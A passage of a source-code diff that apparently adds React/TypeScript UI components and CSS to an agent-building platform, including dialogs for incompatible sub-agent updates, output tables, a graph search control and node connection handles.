2 * mt * t * (path.control2.y - path.control1.y) +
t * t * (path.targetPosition.y - path.control2.y));
return { x, y };
},
[path],
);
const getTForDistance = useCallback(
(distance: number, epsilon: number = 0.0001) => {
if (distance < 0) {
distance = length + distance; // If distance is negative, calculate from the end of the curve
}
let t = distance / getArcLength(1);
let prevT = 0;
while (Math.abs(t - prevT) > epsilon) {
prevT = t;
const length = getArcLength(t);
const derivative = Math.sqrt(
Math.pow(getBezierDerivative(t).x, 2) +
Math.pow(getBezierDerivative(t).y, 2),
);
t -= (length - distance) / derivative;
t = Math.max(0, Math.min(1, t)); // Clamp t between 0 and 1
}
return t;
},
[getArcLength, getBezierDerivative, length],
);
const getPointAtDistance = useCallback(
(distance: number) => {
if (distance < 0) {
distance = length + distance; // If distance is negative, calculate from the end of the curve
}
const t = getTForDistance(distance);
return getPointForT(t);
},
[getTForDistance, getPointForT, length],
);
return {
path,
svgPath,
length,
getPointForT,
getTForDistance,
getPointAtDistance,
};
}

View File

@@ -0,0 +1,244 @@
import React from "react";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/__legacy__/ui/dialog";
import { Button } from "@/components/__legacy__/ui/button";
import { AlertTriangle, XCircle, PlusCircle } from "lucide-react";
import { IncompatibilityInfo } from "../../../hooks/useSubAgentUpdate/types";
import { beautifyString } from "@/lib/utils";
import { Alert, AlertDescription } from "@/components/molecules/Alert/Alert";
interface IncompatibilityDialogProps {
isOpen: boolean;
onClose: () => void;
onConfirm: () => void;
currentVersion: number;
latestVersion: number;
agentName: string;
incompatibilities: IncompatibilityInfo;
}
export const IncompatibilityDialog: React.FC<IncompatibilityDialogProps> = ({
isOpen,
onClose,
onConfirm,
currentVersion,
latestVersion,
agentName,
incompatibilities,
}) => {
const hasMissingInputs = incompatibilities.missingInputs.length > 0;
const hasMissingOutputs = incompatibilities.missingOutputs.length > 0;
const hasNewInputs = incompatibilities.newInputs.length > 0;
const hasNewOutputs = incompatibilities.newOutputs.length > 0;
const hasNewRequired = incompatibilities.newRequiredInputs.length > 0;
const hasTypeMismatches = incompatibilities.inputTypeMismatches.length > 0;
const hasInputChanges = hasMissingInputs || hasNewInputs;
const hasOutputChanges = hasMissingOutputs || hasNewOutputs;
return (
<Dialog open={isOpen} onOpenChange={(open) => !open && onClose()}>
<DialogContent className="max-w-lg">
<DialogHeader>
<DialogTitle className="flex items-center gap-2">
<AlertTriangle className="h-5 w-5 text-amber-500" />
Incompatible Update
</DialogTitle>
<DialogDescription>
Updating <strong>{beautifyString(agentName)}</strong> from v
{currentVersion} to v{latestVersion} will break some connections.
</DialogDescription>
</DialogHeader>
<div className="space-y-4 py-2">
{/* Input changes - two column layout */}
{hasInputChanges && (
<TwoColumnSection
title="Input Changes"
leftIcon={<XCircle className="h-4 w-4 text-red-500" />}
leftTitle="Removed"
leftItems={incompatibilities.missingInputs}
rightIcon={<PlusCircle className="h-4 w-4 text-green-500" />}
rightTitle="Added"
rightItems={incompatibilities.newInputs}
/>
)}
{/* Output changes - two column layout */}
{hasOutputChanges && (
<TwoColumnSection
title="Output Changes"
leftIcon={<XCircle className="h-4 w-4 text-red-500" />}
leftTitle="Removed"
leftItems={incompatibilities.missingOutputs}
rightIcon={<PlusCircle className="h-4 w-4 text-green-500" />}
rightTitle="Added"
rightItems={incompatibilities.newOutputs}
/>
)}
{hasTypeMismatches && (
<SingleColumnSection
icon={<XCircle className="h-4 w-4 text-red-500" />}
title="Type Changed"
description="These connected inputs have a different type:"
items={incompatibilities.inputTypeMismatches.map(
(m) => `${m.name} (${m.oldType}${m.newType})`,
)}
/>
)}
{hasNewRequired && (
<SingleColumnSection
icon={<PlusCircle className="h-4 w-4 text-amber-500" />}
title="New Required Inputs"
description="These inputs are now required:"
items={incompatibilities.newRequiredInputs}
/>
)}
</div>
<Alert variant="warning">
<AlertDescription>
If you proceed, you&apos;ll need to remove the broken connections
before you can save or run your agent.
</AlertDescription>
</Alert>
<DialogFooter className="gap-2 sm:gap-0">
<Button variant="outline" onClick={onClose}>
Cancel
</Button>
<Button
variant="destructive"
onClick={onConfirm}
className="bg-amber-600 hover:bg-amber-700"
>
Update Anyway
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
interface TwoColumnSectionProps {
title: string;
leftIcon: React.ReactNode;
leftTitle: string;
leftItems: string[];
rightIcon: React.ReactNode;
rightTitle: string;
rightItems: string[];
}
const TwoColumnSection: React.FC<TwoColumnSectionProps> = ({
title,
leftIcon,
leftTitle,
leftItems,
rightIcon,
rightTitle,
rightItems,
}) => (
<div className="rounded-md border border-gray-200 p-3 dark:border-gray-700">
<span className="font-medium">{title}</span>
<div className="mt-2 grid grid-cols-2 items-start gap-4">
{/* Left column - Breaking changes */}
<div className="min-w-0">
<div className="flex items-center gap-1.5 text-sm text-gray-500 dark:text-gray-400">
{leftIcon}
<span>{leftTitle}</span>
</div>
<ul className="mt-1.5 space-y-1">
{leftItems.length > 0 ? (
leftItems.map((item) => (
<li
key={item}
className="text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-red-50 px-1 py-0.5 font-mono text-xs text-red-700 dark:bg-red-900/30 dark:text-red-300">
{item}
</code>
</li>
))
) : (
<li className="text-sm italic text-gray-400 dark:text-gray-500">
None
</li>
)}
</ul>
</div>
{/* Right column - Possible solutions */}
<div className="min-w-0">
<div className="flex items-center gap-1.5 text-sm text-gray-500 dark:text-gray-400">
{rightIcon}
<span>{rightTitle}</span>
</div>
<ul className="mt-1.5 space-y-1">
{rightItems.length > 0 ? (
rightItems.map((item) => (
<li
key={item}
className="text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-green-50 px-1 py-0.5 font-mono text-xs text-green-700 dark:bg-green-900/30 dark:text-green-300">
{item}
</code>
</li>
))
) : (
<li className="text-sm italic text-gray-400 dark:text-gray-500">
None
</li>
)}
</ul>
</div>
</div>
</div>
);
interface SingleColumnSectionProps {
icon: React.ReactNode;
title: string;
description: string;
items: string[];
}
const SingleColumnSection: React.FC<SingleColumnSectionProps> = ({
icon,
title,
description,
items,
}) => (
<div className="rounded-md border border-gray-200 p-3 dark:border-gray-700">
<div className="flex items-center gap-2">
{icon}
<span className="font-medium">{title}</span>
</div>
<p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
{description}
</p>
<ul className="mt-2 space-y-1">
{items.map((item) => (
<li
key={item}
className="ml-4 list-disc text-sm text-gray-700 dark:text-gray-300"
>
<code className="rounded bg-gray-100 px-1 py-0.5 font-mono text-xs dark:bg-gray-800">
{item}
</code>
</li>
))}
</ul>
</div>
);
export default IncompatibilityDialog;

View File

@@ -0,0 +1,130 @@
import React from "react";
import { Button } from "@/components/__legacy__/ui/button";
import { ArrowUp, AlertTriangle, Info } from "lucide-react";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { IncompatibilityInfo } from "../../../hooks/useSubAgentUpdate/types";
import { cn } from "@/lib/utils";
interface SubAgentUpdateBarProps {
currentVersion: number;
latestVersion: number;
isCompatible: boolean;
incompatibilities: IncompatibilityInfo | null;
onUpdate: () => void;
isInResolutionMode?: boolean;
}
export const SubAgentUpdateBar: React.FC<SubAgentUpdateBarProps> = ({
currentVersion,
latestVersion,
isCompatible,
incompatibilities,
onUpdate,
isInResolutionMode = false,
}) => {
if (isInResolutionMode) {
return <ResolutionModeBar incompatibilities={incompatibilities} />;
}
return (
<div className="flex items-center justify-between gap-2 rounded-t-lg bg-blue-50 px-3 py-2 dark:bg-blue-900/30">
<div className="flex items-center gap-2">
<ArrowUp className="h-4 w-4 text-blue-600 dark:text-blue-400" />
<span className="text-sm text-blue-700 dark:text-blue-300">
Update available (v{currentVersion} v{latestVersion})
</span>
{!isCompatible && (
<Tooltip>
<TooltipTrigger asChild>
<AlertTriangle className="h-4 w-4 text-amber-500" />
</TooltipTrigger>
<TooltipContent className="max-w-xs">
<p className="font-medium">Incompatible changes detected</p>
<p className="text-xs text-gray-400">
Click Update to see details
</p>
</TooltipContent>
</Tooltip>
)}
</div>
<Button
size="sm"
variant={isCompatible ? "default" : "outline"}
onClick={onUpdate}
className={cn(
"h-7 text-xs",
!isCompatible && "border-amber-500 text-amber-600 hover:bg-amber-50",
)}
>
Update
</Button>
</div>
);
};
interface ResolutionModeBarProps {
incompatibilities: IncompatibilityInfo | null;
}
const ResolutionModeBar: React.FC<ResolutionModeBarProps> = ({
incompatibilities,
}) => {
const formatIncompatibilities = () => {
if (!incompatibilities) return "No incompatibilities";
const items: string[] = [];
if (incompatibilities.missingInputs.length > 0) {
items.push(
`Missing inputs: ${incompatibilities.missingInputs.join(", ")}`,
);
}
if (incompatibilities.missingOutputs.length > 0) {
items.push(
`Missing outputs: ${incompatibilities.missingOutputs.join(", ")}`,
);
}
if (incompatibilities.newRequiredInputs.length > 0) {
items.push(
`New required inputs: ${incompatibilities.newRequiredInputs.join(", ")}`,
);
}
if (incompatibilities.inputTypeMismatches.length > 0) {
const mismatches = incompatibilities.inputTypeMismatches
.map((m) => `${m.name} (${m.oldType}${m.newType})`)
.join(", ");
items.push(`Type changed: ${mismatches}`);
}
return items.join("\n");
};
return (
<div className="flex items-center justify-between gap-2 rounded-t-lg bg-amber-50 px-3 py-2 dark:bg-amber-900/30">
<div className="flex items-center gap-2">
<AlertTriangle className="h-4 w-4 text-amber-600 dark:text-amber-400" />
<span className="text-sm text-amber-700 dark:text-amber-300">
Remove incompatible connections
</span>
<Tooltip>
<TooltipTrigger asChild>
<Info className="h-4 w-4 cursor-help text-amber-500" />
</TooltipTrigger>
<TooltipContent className="max-w-sm whitespace-pre-line">
<p className="font-medium">Incompatible changes:</p>
<p className="mt-1 text-xs">{formatIncompatibilities()}</p>
<p className="mt-2 text-xs text-gray-400">
Delete the red connections to continue
</p>
</TooltipContent>
</Tooltip>
</div>
</div>
);
};
export default SubAgentUpdateBar;

View File

@@ -0,0 +1,131 @@
.custom-node {
color: #000000;
box-sizing: border-box;
transition: border-color 0.3s ease-in-out;
}
.custom-node .custom-switch {
padding: 0.5rem 1.25rem;
display: flex;
align-items: center;
justify-content: space-between;
}
.error-message {
color: #d9534f;
font-size: 13px;
padding-left: 0.5rem;
}
/* Existing styles */
.handle-container {
display: flex;
position: relative;
margin-bottom: 0px;
padding: 5px;
min-height: 44px;
height: 100%;
}
.react-flow__handle {
background: transparent;
width: auto;
height: auto;
border: 0;
position: relative;
transform: none;
}
.border-error {
border: 1px solid #d9534f;
}
.select-input {
width: 100%;
padding: 5px;
border-radius: 4px;
border: 1px solid #000;
background: #fff;
color: #000;
}
.radio-label {
display: block;
margin: 5px 0;
color: #000;
}
.number-input {
width: 100%;
padding: 5px;
border-radius: 4px;
background: #fff;
color: #000;
}
.array-item-container {
display: flex;
align-items: center;
margin-bottom: 5px;
}
.array-item-input {
flex-grow: 1;
padding: 5px;
border-radius: 4px;
border: 1px solid #000;
background: #fff;
color: #000;
}
.array-item-remove {
background: #d9534f;
border: none;
color: white;
cursor: pointer;
margin-left: 5px;
border-radius: 4px;
padding: 5px 10px;
}
.array-item-add {
background: #5bc0de;
border: none;
color: white;
cursor: pointer;
border-radius: 4px;
padding: 5px 10px;
margin-top: 5px;
}
.error-message {
color: #d9534f;
font-size: 13px;
margin-top: 5px;
margin-left: 5px;
}
/* Styles for node states */
.completed {
border-color: #27ae60; /* Green border for completed nodes */
}
.running {
border-color: #f39c12; /* Orange border for running nodes */
}
.failed {
border-color: #c0392b; /* Red border for failed nodes */
}
.incomplete {
border-color: #9f14ab; /* Pink border for incomplete nodes */
}
.queued {
border-color: #25e6e6; /* Cyan border for queued nodes */
}
.custom-switch {
padding-left: 2px;
}

View File

@@ -0,0 +1,166 @@
import { beautifyString } from "@/lib/utils";
import { Clipboard, Maximize2 } from "lucide-react";
import React, { useMemo, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { ContentRenderer } from "../../../../../components/__legacy__/ui/render";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "../../../../../components/__legacy__/ui/table";
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { useToast } from "../../../../../components/molecules/Toast/use-toast";
import ExpandableOutputDialog from "./ExpandableOutputDialog";
type DataTableProps = {
title?: string;
truncateLongData?: boolean;
data: { [key: string]: Array<any> };
};
export default function DataTable({
title,
truncateLongData,
data,
}: DataTableProps) {
const { toast } = useToast();
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [expandedDialog, setExpandedDialog] = useState<{
isOpen: boolean;
execId: string;
pinName: string;
data: any[];
} | null>(null);
// Prepare renderers for each item when enhanced mode is enabled
const getItemRenderer = useMemo(() => {
if (!enableEnhancedOutputHandling) return null;
return (item: unknown) => {
const metadata: OutputMetadata = {};
return globalRegistry.getRenderer(item, metadata);
};
}, [enableEnhancedOutputHandling]);
const copyData = (pin: string, data: string) => {
navigator.clipboard.writeText(data).then(() => {
toast({
title: `"${pin}" data copied to clipboard!`,
duration: 2000,
});
});
};
const openExpandedView = (pinName: string, pinData: any[]) => {
setExpandedDialog({
isOpen: true,
execId: title || "Unknown Execution",
pinName,
data: pinData,
});
};
const closeExpandedView = () => {
setExpandedDialog(null);
};
return (
<>
{title && <strong className="mt-2 flex justify-center">{title}</strong>}
<Table className="cursor-default select-text">
<TableHeader>
<TableRow>
<TableHead>Pin</TableHead>
<TableHead>Data</TableHead>
</TableRow>
</TableHeader>
<TableBody>
{Object.entries(data).map(([key, value]) => (
<TableRow className="group" key={key}>
<TableCell className="cursor-text">
{beautifyString(key)}
</TableCell>
<TableCell className="cursor-text">
<div className="flex min-h-9 items-center whitespace-pre-wrap">
<div className="absolute right-1 top-auto m-1 hidden gap-1 group-hover:flex">
<Button
variant="outline"
size="icon"
onClick={() => openExpandedView(key, value)}
title="Expand Full View"
>
<Maximize2 size={18} />
</Button>
<Button
variant="outline"
size="icon"
onClick={() =>
copyData(
beautifyString(key),
value
.map((i) =>
typeof i === "object"
? JSON.stringify(i, null, 2)
: String(i),
)
.join(", "),
)
}
title="Copy Data"
>
<Clipboard size={18} />
</Button>
</div>
{value.map((item, index) => {
const renderer = getItemRenderer?.(item);
if (enableEnhancedOutputHandling && renderer) {
const metadata: OutputMetadata = {};
return (
<React.Fragment key={index}>
<OutputItem
value={item}
metadata={metadata}
renderer={renderer}
/>
{index < value.length - 1 && ", "}
</React.Fragment>
);
}
return (
<React.Fragment key={index}>
<ContentRenderer
value={item}
truncateLongData={truncateLongData}
/>
{index < value.length - 1 && ", "}
</React.Fragment>
);
})}
</div>
</TableCell>
</TableRow>
))}
</TableBody>
</Table>
{expandedDialog && (
<ExpandableOutputDialog
isOpen={expandedDialog.isOpen}
onClose={closeExpandedView}
execId={expandedDialog.execId}
pinName={expandedDialog.pinName}
data={expandedDialog.data}
/>
)}
</>
);
}

View File

@@ -0,0 +1,269 @@
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputActions,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Dialog } from "@/components/molecules/Dialog/Dialog";
import { beautifyString } from "@/lib/utils";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { Clipboard, Maximize2 } from "lucide-react";
import React, { FC, useMemo, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { ContentRenderer } from "../../../../../components/__legacy__/ui/render";
import { ScrollArea } from "../../../../../components/__legacy__/ui/scroll-area";
import { Separator } from "../../../../../components/__legacy__/ui/separator";
import { Switch } from "../../../../../components/atoms/Switch/Switch";
import { useToast } from "../../../../../components/molecules/Toast/use-toast";
interface ExpandableOutputDialogProps {
isOpen: boolean;
onClose: () => void;
execId: string;
pinName: string;
data: any[];
}
const ExpandableOutputDialog: FC<ExpandableOutputDialogProps> = ({
isOpen,
onClose,
execId,
pinName,
data,
}) => {
const { toast } = useToast();
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [useEnhancedRenderer, setUseEnhancedRenderer] = useState(false);
// Prepare items for the enhanced renderer system
const outputItems = useMemo(() => {
if (!data || !useEnhancedRenderer) return [];
const items: Array<{
key: string;
label: string;
value: unknown;
metadata?: OutputMetadata;
renderer: any;
}> = [];
data.forEach((value, index) => {
const metadata: OutputMetadata = {};
// Extract metadata from the value if it's an object
if (
typeof value === "object" &&
value !== null &&
!React.isValidElement(value)
) {
const objValue = value as any;
if (objValue.type) metadata.type = objValue.type;
if (objValue.mimeType) metadata.mimeType = objValue.mimeType;
if (objValue.filename) metadata.filename = objValue.filename;
if (objValue.language) metadata.language = objValue.language;
}
const renderer = globalRegistry.getRenderer(value, metadata);
if (renderer) {
items.push({
key: `item-${index}`,
label: index === 0 ? beautifyString(pinName) : "",
value,
metadata,
renderer,
});
} else {
// Fallback to text renderer
const textRenderer = globalRegistry
.getAllRenderers()
.find((r) => r.name === "TextRenderer");
if (textRenderer) {
items.push({
key: `item-${index}`,
label: index === 0 ? beautifyString(pinName) : "",
value:
typeof value === "string"
? value
: JSON.stringify(value, null, 2),
metadata,
renderer: textRenderer,
});
}
}
});
return items;
}, [data, useEnhancedRenderer, pinName]);
const copyData = () => {
const formattedData = data
.map((item) =>
typeof item === "object" ? JSON.stringify(item, null, 2) : String(item),
)
.join("\n\n");
navigator.clipboard.writeText(formattedData).then(() => {
toast({
title: `"${beautifyString(pinName)}" data copied to clipboard!`,
duration: 2000,
});
});
};
return (
<Dialog
title={
<div className="flex items-center justify-between pr-8">
<div className="flex items-center gap-2">
<Maximize2 size={20} />
Full Output Preview
</div>
{enableEnhancedOutputHandling && (
<div className="flex items-center gap-3">
<label
htmlFor="enhanced-rendering-toggle"
className="cursor-pointer select-none text-sm font-normal text-gray-600"
>
Enhanced Rendering
</label>
<Switch
id="enhanced-rendering-toggle"
checked={useEnhancedRenderer}
onCheckedChange={setUseEnhancedRenderer}
/>
</div>
)}
</div>
}
controlled={{
isOpen,
set: (open) => {
if (!open) onClose();
},
}}
onClose={onClose}
styling={{
maxWidth: "56rem",
width: "90vw",
height: "90vh",
}}
>
<Dialog.Content>
<div className="flex h-full flex-col">
<div className="pb-4">
<p className="text-sm text-zinc-600">
Execution ID: <span className="font-mono text-xs">{execId}</span>
<br />
Pin:{" "}
<span className="font-semibold">{beautifyString(pinName)}</span>
</p>
</div>
<div className="flex flex-1 flex-col overflow-hidden">
{useEnhancedRenderer && outputItems.length > 0 && (
<div className="border-b px-4 py-2">
<OutputActions
items={outputItems.map((item) => ({
value: item.value,
metadata: item.metadata,
renderer: item.renderer,
}))}
/>
</div>
)}
<ScrollArea className="h-full">
<div className="p-4">
{data.length > 0 ? (
useEnhancedRenderer ? (
<div className="space-y-4">
{outputItems.map((item) => (
<OutputItem
key={item.key}
value={item.value}
metadata={item.metadata}
renderer={item.renderer}
label={item.label}
/>
))}
</div>
) : (
<div className="space-y-4">
{data.map((item, index) => (
<div
key={index}
className="rounded-lg border bg-gray-50 p-4"
>
<div className="mb-2 flex items-center justify-between">
<span className="text-sm font-medium text-gray-600">
Item {index + 1} of {data.length}
</span>
<Button
variant="outline"
size="sm"
onClick={() => {
const itemData =
typeof item === "object"
? JSON.stringify(item, null, 2)
: String(item);
navigator.clipboard
.writeText(itemData)
.then(() => {
toast({
title: `Item ${index + 1} copied to clipboard!`,
duration: 2000,
});
});
}}
className="flex items-center gap-1"
>
<Clipboard size={14} />
Copy Item
</Button>
</div>
<Separator className="mb-3" />
<div className="whitespace-pre-wrap break-words font-mono text-sm">
<ContentRenderer
value={item}
truncateLongData={false}
/>
</div>
</div>
))}
</div>
)
) : (
<div className="py-8 text-center text-gray-500">
No data available
</div>
)}
</div>
</ScrollArea>
</div>
<Dialog.Footer className="flex justify-between">
<div className="text-sm text-gray-600">
{data.length} item{data.length !== 1 ? "s" : ""} total
</div>
<div className="flex gap-2">
{!useEnhancedRenderer && (
<Button
variant="outline"
onClick={copyData}
className="flex items-center gap-1"
>
<Clipboard size={16} />
Copy All
</Button>
)}
<Button onClick={onClose}>Close</Button>
</div>
</Dialog.Footer>
</div>
</Dialog.Content>
</Dialog>
);
};
export default ExpandableOutputDialog;

View File

@@ -0,0 +1,103 @@
/* flow.css or index.css */
body {
font-family:
-apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu",
"Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
code {
font-family:
source-code-pro, Menlo, Monaco, Consolas, "Courier New", monospace;
}
.modal {
position: absolute;
top: 50%;
left: 50%;
right: auto;
bottom: auto;
margin-right: -50%;
transform: translate(-50%, -50%);
background: #ffffff;
padding: 20px;
border: 1px solid #ccc;
border-radius: 4px;
color: #000000;
}
.overlay {
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-color: rgba(0, 0, 0, 0.75);
}
.modal h2 {
margin-top: 0;
}
.modal button {
margin-right: 10px;
}
.modal form {
display: flex;
flex-direction: column;
}
.modal form div {
margin-bottom: 15px;
}
.sidebar {
position: fixed;
top: 0;
left: -600px;
width: 350px;
height: calc(100vh - 68px); /* Full height minus top offset */
background-color: #ffffff;
color: #000000;
padding: 20px;
transition: left 0.3s ease;
z-index: 1000;
overflow-y: auto;
margin-top: 68px; /* Margin to push content below the top fixed area */
}
.sidebar.open {
left: 0;
}
.sidebar h3 {
margin: 0 0 10px;
}
.sidebar input {
margin: 0 0 10px;
}
.sidebarNodeRowStyle {
display: flex;
justify-content: space-between;
align-items: center;
background-color: #e2e2e2;
padding: 10px;
margin-bottom: 10px;
border-radius: 10px;
cursor: grab;
}
.sidebarNodeRowStyle.dragging {
opacity: 0.5;
}
.flow-container {
position: absolute;
top: 0;
left: 0;
width: 100vw;
height: 100vh;
}

View File

@@ -0,0 +1,82 @@
import React from "react";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Button } from "@/components/atoms/Button/Button";
import { MagnifyingGlassIcon } from "@radix-ui/react-icons";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { GraphSearchContent } from "../NewControlPanel/NewSearchGraph/GraphMenuContent/GraphContent";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { useGraphMenu } from "../NewControlPanel/NewSearchGraph/GraphMenu/useGraphMenu";
interface GraphSearchControlProps {
nodes: CustomNode[];
onNodeSelect: (nodeId: string) => void;
onNodeHover?: (nodeId: string | null) => void;
}
export function GraphSearchControl({
nodes,
onNodeSelect,
onNodeHover,
}: GraphSearchControlProps) {
// Use the same hook as GraphSearchMenu for consistency
const {
open,
searchQuery,
setSearchQuery,
filteredNodes,
handleNodeSelect,
handleOpenChange,
} = useGraphMenu({
nodes,
blockMenuSelected: "", // We don't need to track this in the old control panel
setBlockMenuSelected: () => {}, // Not needed in this context
onNodeSelect,
});
return (
<Popover open={open} onOpenChange={handleOpenChange}>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="graph-search-control-trigger"
data-testid="graph-search-control-button"
name="Search"
className="dark:hover:bg-slate-800"
>
<MagnifyingGlassIcon className="h-5 w-5" />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Search Graph</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={22}
align="start"
alignOffset={-50} // Offset upward to align with control panel top
className="absolute -top-3 w-[17rem] rounded-xl border-none p-0 shadow-none md:w-[30rem]"
data-id="graph-search-popover-content"
>
<GraphSearchContent
searchQuery={searchQuery}
onSearchChange={setSearchQuery}
filteredNodes={filteredNodes}
onNodeSelect={handleNodeSelect}
onNodeHover={onNodeHover}
/>
</PopoverContent>
</Popover>
);
}

View File

@@ -0,0 +1,107 @@
import React, { FC, useEffect, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { Textarea } from "../../../../../components/__legacy__/ui/textarea";
import { Maximize2, Minimize2, Clipboard } from "lucide-react";
import { createPortal } from "react-dom";
import { toast } from "../../../../../components/molecules/Toast/use-toast";
interface ModalProps {
isOpen: boolean;
onClose: () => void;
onSave: (value: string) => void;
title?: string;
defaultValue: string;
}
const InputModalComponent: FC<ModalProps> = ({
isOpen,
onClose,
onSave,
title,
defaultValue,
}) => {
const [tempValue, setTempValue] = useState(defaultValue);
const [isMaximized, setIsMaximized] = useState(false);
useEffect(() => {
if (isOpen) {
setTempValue(defaultValue);
setIsMaximized(false);
}
}, [isOpen, defaultValue]);
const handleSave = () => {
onSave(tempValue);
onClose();
};
const toggleSize = () => {
setIsMaximized(!isMaximized);
};
const copyValue = () => {
navigator.clipboard.writeText(tempValue).then(() => {
toast({
title: "Input value copied to clipboard!",
duration: 2000,
});
});
};
if (!isOpen) {
return null;
}
const modalContent = (
<div
id="modal-content"
className={`fixed rounded-lg border-[1.5px] bg-white p-5 ${
isMaximized ? "inset-[128px] flex flex-col" : `w-[90%] max-w-[800px]`
}`}
>
<h2 className="mb-4 text-center text-lg font-semibold">
{title || "Enter input text"}
</h2>
<div className="nowheel relative flex-grow">
<Textarea
className="h-full min-h-[200px] w-full resize-none"
value={tempValue}
onChange={(e) => setTempValue(e.target.value)}
/>
<div className="absolute bottom-2 right-2 flex space-x-2">
<Button onClick={copyValue} size="icon" variant="outline">
<Clipboard size={18} />
</Button>
<Button onClick={toggleSize} size="icon" variant="outline">
{isMaximized ? <Minimize2 size={18} /> : <Maximize2 size={18} />}
</Button>
</div>
</div>
<div className="mt-4 flex justify-end space-x-2">
<Button onClick={onClose} variant="outline">
Cancel
</Button>
<Button onClick={handleSave}>Save</Button>
</div>
</div>
);
return (
<>
{isMaximized ? (
createPortal(
<div className="fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
{modalContent}
</div>,
document.body,
)
) : (
<div className="nodrag fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
{modalContent}
</div>
)}
</>
);
};
export default InputModalComponent;

View File

@@ -0,0 +1,163 @@
import { BlockIOSubSchema } from "@/lib/autogpt-server-api/types";
import {
cn,
beautifyString,
getTypeBgColor,
getTypeTextColor,
getEffectiveType,
} from "@/lib/utils";
import { FC, memo, useCallback } from "react";
import { Handle, Position } from "@xyflow/react";
import { InformationTooltip } from "@/components/molecules/InformationTooltip/InformationTooltip";
type HandleProps = {
keyName: string;
schema: BlockIOSubSchema;
isConnected: boolean;
isRequired?: boolean;
side: "left" | "right";
title?: string;
className?: string;
isBroken?: boolean;
};
// Move the constant out of the component to avoid re-creation on every render.
const TYPE_NAME: Record<string, string> = {
string: "text",
number: "number",
integer: "integer",
boolean: "true/false",
object: "object",
array: "list",
null: "null",
};
// Extract and memoize the Dot component so that it doesn't re-render unnecessarily.
const Dot: FC<{ isConnected: boolean; type?: string; isBroken?: boolean }> =
memo(({ isConnected, type, isBroken }) => {
const color = isBroken
? "border-red-500 bg-red-100 dark:bg-red-900/30"
: isConnected
? getTypeBgColor(type || "any")
: "border-gray-300 dark:border-gray-600";
return (
<div
className={cn(
"m-1 h-4 w-4 rounded-full border-2 bg-white transition-colors duration-100 group-hover:bg-gray-300 dark:bg-slate-800 dark:group-hover:bg-gray-700",
color,
isBroken && "opacity-50",
)}
/>
);
});
Dot.displayName = "Dot";
const NodeHandle: FC<HandleProps> = ({
keyName,
schema,
isConnected,
isRequired,
side,
title,
className,
isBroken = false,
}) => {
// Extract effective type from schema (handles anyOf/oneOf/allOf wrappers)
const effectiveType = getEffectiveType(schema);
const typeClass = `text-sm ${getTypeTextColor(effectiveType || "any")} ${
side === "left" ? "text-left" : "text-right"
}`;
const label = (
<div className={cn("flex flex-grow flex-row", isBroken && "opacity-50")}>
<span
className={cn(
"data-sentry-unmask text-m green flex items-end pr-2 text-gray-900 dark:text-gray-100",
className,
isBroken && "text-red-500 line-through",
)}
>
{title || schema.title || beautifyString(keyName.toLowerCase())}
{isRequired ? "*" : ""}
</span>
<span
className={cn(
`${typeClass} data-sentry-unmask flex items-end`,
isBroken && "text-red-400",
)}
>
({TYPE_NAME[effectiveType as keyof typeof TYPE_NAME] || "any"})
</span>
</div>
);
// Use a native HTML onContextMenu handler instead of wrapping a large node with a Radix ContextMenu trigger.
const handleContextMenu = useCallback(
(e: React.MouseEvent<HTMLDivElement>) => {
e.preventDefault();
// Optionally, you can trigger a custom, lightweight context menu here.
},
[],
);
if (side === "left") {
return (
<div
key={keyName}
className={cn("handle-container", isBroken && "pointer-events-none")}
onContextMenu={handleContextMenu}
>
<Handle
type="target"
data-testid={`input-handle-${keyName}`}
position={Position.Left}
id={keyName}
className={cn("group -ml-[38px]", isBroken && "cursor-not-allowed")}
isConnectable={!isBroken}
>
<div className="pointer-events-none flex items-center">
<Dot
isConnected={isConnected}
type={effectiveType}
isBroken={isBroken}
/>
{label}
</div>
</Handle>
<InformationTooltip description={schema.description} />
</div>
);
} else {
return (
<div
key={keyName}
className={cn(
"handle-container justify-end",
isBroken && "pointer-events-none",
)}
onContextMenu={handleContextMenu}
>
<Handle
type="source"
data-testid={`output-handle-${keyName}`}
position={Position.Right}
id={keyName}
className={cn("group -mr-[38px]", isBroken && "cursor-not-allowed")}
isConnectable={!isBroken}
>
<div className="pointer-events-none flex items-center">
{label}
<Dot
isConnected={isConnected}
type={effectiveType}
isBroken={isBroken}
/>
</div>
</Handle>
</div>
);
}
};
export default memo(NodeHandle);

View File

@@ -0,0 +1,158 @@
